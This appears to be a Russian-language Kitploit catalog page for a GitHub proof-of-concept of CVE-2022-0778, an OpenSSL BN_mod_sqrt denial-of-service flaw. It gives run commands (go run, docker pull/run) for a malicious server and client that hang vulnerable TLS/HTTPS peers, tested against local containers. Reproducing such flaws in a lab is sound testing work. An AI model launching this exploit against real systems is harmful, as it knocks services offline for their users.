Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
cve-2022-0778 — Эксплойт концепции (proof-of-concept) для CVE-2022-0778, уязвимости типа «отказ в обслуживании» в функции BN_mod_sqrt библиотеки OpenSSL. Включает реализации вредоносного сервера и клиента для запуска бесконечных циклов в уязвимых TLS/HTTPS-соединениях. | Kitploit
Инструменты/GitHubGitHub/yywing/cve-2022-0778
Анализ уязвимостейЭксплуатацияВеб-безопасностьСетевая безопасностьТестирование на Проникновение
GitHubyywing/cve-2022-0778

cve-2022-0778

Эксплойт концепции (proof-of-concept) для CVE-2022-0778, уязвимости типа «отказ в обслуживании» в функции BN_mod_sqrt библиотеки OpenSSL. Включает реализации вредоносного сервера и клиента для запуска бесконечных циклов в уязвимых TLS/HTTPS-соединениях.

Репозиторий
954 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

cve-2022-0778

вредоносный сервер

root@kitploit:~
go run server/main.go --addr 127.0.0.1:12345

cd test && test_server.sh

docker stat

вредоносный клиент

root@kitploit:~
cd test && test_client.sh

go run client/main.go  --network tcp --addr 127.0.0.1:12345

docker stat

сборка

root@kitploit:~
docker build -t cve-2022-0778 .

docker hub

root@kitploit:~
# start vulned server
docker pull yywing/cve-2022-0778-target
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778-target python server.py
# attack
docker pull yywing/cve-2022-0778
docker run -it --rm --entrypoint badclient yywing/cve-2022-0778 --addr host.docker.internal:12345

# start bad server
docker run -it --rm -p 12345:12345 yywing/cve-2022-0778 --addr 0.0.0.0:12345
# use vulned client
docker run -it --rm yywing/cve-2022-0778-target python -c "import http.client;http.client.HTTPSConnection('host.docker.internal', 12345).request('GET', '/')"
# or
docker run -it --rm yywing/cve-2022-0778-target curl https://host.docker.internal:12345
Скачать инструмент